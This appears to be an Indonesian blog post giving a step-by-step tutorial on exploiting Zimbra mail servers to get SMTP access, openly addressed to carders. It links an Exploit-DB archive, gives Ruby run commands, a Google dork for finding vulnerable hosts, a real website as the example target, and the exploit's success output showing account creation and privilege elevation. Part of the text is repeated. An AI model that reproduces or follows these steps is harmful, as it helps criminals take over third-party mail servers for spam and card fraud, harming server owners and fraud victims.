Tutorial Exploit Zimbra ( Untuk mencari SMTP )
Ketemu lagi ama Ane Anak Tatad Karena seiringnya perubahan Zaman ane jadi ganti Profesi
Yang dulu Gamers (doyan ngecheat, cheatnya ngemis pula ) skrg jadi ***** Terserah ente mau nyebut apa
Yukk langsung aja To The Point
Di sini ane mau ngasih tutorial how to EXPLOIT Zimbra atau Untuk mencari SMTP(Send Mail To Protocol)
Untuk para Carder pasti ngerti lah apa fungsi dan kegunaan SMTP
Wajib DownloadAplikasi ruby
Exploitd-DB mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip
Langkah Installasi dan cara memperintahkan di cmd
Untuk mencari target butuh dork zimbra, ane hanya ngasih 1 dork
inurl:"web client zimbra login"
Untuk dork lain silahkan mencari dan mengembangkan dork sendiri
Langkah mencari target :
Jika sukses ada notice sepeti ini di cmd
[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
-
Yang dulu Gamers (doyan ngecheat, cheatnya ngemis pula ) skrg jadi ***** Terserah ente mau nyebut apa
Yukk langsung aja To The Point
Di sini ane mau ngasih tutorial how to EXPLOIT Zimbra atau Untuk mencari SMTP(Send Mail To Protocol)
Untuk para Carder pasti ngerti lah apa fungsi dan kegunaan SMTP
Wajib DownloadAplikasi ruby
Exploitd-DB mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip
Langkah Installasi dan cara memperintahkan di cmd
- Instal ruby samapai selesai di program files c:\
- Download exploit db nya
- Setalah di download jang lupa extrak file nya di program file ruby
- ruby - bin; extrak di situ
- Buka cmd
- Jalan kan perintah nya
- "cd c:\ruby\bin" *tanpakutip
- ruby run.rb -t http://www.target.com
Untuk mencari target butuh dork zimbra, ane hanya ngasih 1 dork
inurl:"web client zimbra login"
Untuk dork lain silahkan mencari dan mengembangkan dork sendiri
Langkah mencari target :
- Buka google.com
- Masukkan dork diatas tadi kedalam google
- Contoh : http://www.linuxquestions.org/questions/linux-server-73/customize-zimbra-web-client-login-screen-in-v8-4175450789/
ambil website domainnya saja, http://www.linuxquestions.org - Copy dan Paste di cmd yang tadi sudah diberi perintah,
c:/ruby/bin>ruby run.rb -t http://www.linuxquestions.org - Kemudian liat hasilnya
Jika sukses ada notice sepeti ini di cmd
[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
-
NB :
- Untuk nama folder "ruby" *tanpakutip (huruf kecil)
- Wajib install di Local disk C
Tidak ada komentar:
Posting Komentar